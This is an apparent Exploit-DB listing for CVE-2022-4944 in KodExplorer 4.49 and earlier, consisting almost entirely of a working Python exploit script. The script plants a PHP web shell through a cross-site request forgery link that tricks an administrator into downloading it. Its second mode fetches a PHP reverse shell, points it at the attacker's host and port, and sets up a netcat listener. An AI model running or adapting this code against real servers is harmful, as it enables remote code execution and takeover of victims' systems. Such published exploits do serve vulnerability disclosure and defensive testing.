KodExplorer 4.49 - CSRF to Arbitrary File Upload

EDB-ID:

51388


Author:

Mr Empy

Type:

webapps


Platform:

PHP

Date:

2023-04-25


# Exploit Title: KodExplorer <= 4.49 - CSRF to Arbitrary File Upload
# Date: 21/04/2023
# Exploit Author: MrEmpy
# Software Link: https://github.com/kalcaddle/KodExplorer
# Version: <= 4.49
# Tested on: Linux
# CVE ID: CVE-2022-4944
# References:
# * https://vuldb.com/?id.227000
# * https://www.cve.org/CVERecord?id=CVE-2022-4944
# * https://github.com/MrEmpy/CVE-2022-4944

import argparse
import http.server
import socketserver
import os
import threading
import requests
from time import sleep

def banner():
    print('''
 _   _____________ _____           _                      ______  _____
 _____
| | / /  _  |  _  \  ___|         | |                     | ___ \/  __ \|
 ___|
| |/ /| | | | | | | |____  ___ __ | | ___  _ __ ___ _ __  | |_/ /| /  \/|
|__
|    \| | | | | | |  __\ \/ / '_ \| |/ _ \| '__/ _ \ '__| |    / | |    |
 __|
| |\  \ \_/ / |/ /| |___>  <| |_) | | (_) | | |  __/ |    | |\ \ | \__/\|
|___
\_| \_/\___/|___/ \____/_/\_\ .__/|_|\___/|_|  \___|_|    \_| \_|
\____/\____/
                            | |

                            |_|

                [KODExplorer <= v4.49 Remote Code Executon]
                           [Coded by MrEmpy]

''')

def httpd():
    port = 8080
    httpddir = os.path.join(os.path.dirname(__file__), 'http')
    os.chdir(httpddir)
    Handler = http.server.SimpleHTTPRequestHandler
    httpd = socketserver.TCPServer(('', port), Handler)
    print('[+] HTTP Server started')
    httpd.serve_forever()


def webshell(url, lhost):
    payload = '<pre><?php system($_GET["cmd"])?></pre>'
    path = '/data/User/admin/home/'

    targetpath = input('[*] Target KODExplorer path (ex /var/www/html): ')
    wshell_f = open('http/shell.php', 'w')
    wshell_f.write(payload)
    wshell_f.close()
    print('[*] Opening HTTPd port')
    th = threading.Thread(target=httpd)
    th.start()
    print(f'[+] Send this URI to your target:
{url}/index.php?explorer/serverDownload&type=download&savePath={targetpath}/data/User/admin/home/&url=http://
{lhost}:8080/shell.php&uuid=&time=')
    print(f'[+] After the victim opens the URI, his shell will be hosted at
{url}/data/User/admin/home/shell.php?cmd=whoami')

def reverseshell(url, lhost):
    rvpayload = '
https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
'
    path = '/data/User/admin/home/'

    targetpath = input('[*] Target KODExplorer path (ex /var/www/html): ')
    lport = input('[*] Your local port: ')
    reqpayload = requests.get(rvpayload).text
    reqpayload = reqpayload.replace('127.0.0.1', lhost)
    reqpayload = reqpayload.replace('1234', lport)
    wshell_f = open('http/shell.php', 'w')
    wshell_f.write(reqpayload)
    wshell_f.close()
    print('[*] Opening HTTPd port')
    th = threading.Thread(target=httpd)
    th.start()
    print(f'[+] Send this URI to your target:
{url}/index.php?explorer/serverDownload&type=download&savePath={targetpath}/data/User/admin/home/&url=http://
{lhost}:8080/shell.php&uuid=&time=')
    input(f'[*] Run the command "nc -lnvp {lport}" to receive the
connection and press any key\n')
    while True:
        hitshell = requests.get(f'{url}/data/User/admin/home/shell.php')
        sleep(1)
        if not hitshell.status_code == 200:
            continue
        else:
            print('[+] Shell sent and executed!')
            break


def main(url, lhost, mode):
    banner()
    if mode == 'webshell':
        webshell(url, lhost)
    elif mode == 'reverse':
        reverseshell(url, lhost)
    else:
        print('[-] There is no such mode. Use webshell or reverse')


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('-u','--url', action='store', help='target url',
dest='url', required=True)
    parser.add_argument('-lh','--local-host', action='store', help='local
host', dest='lhost', required=True)
    parser.add_argument('-m','--mode', action='store', help='mode
(webshell, reverse)', dest='mode', required=True)
    arguments = parser.parse_args()
    main(arguments.url, arguments.lhost, arguments.mode)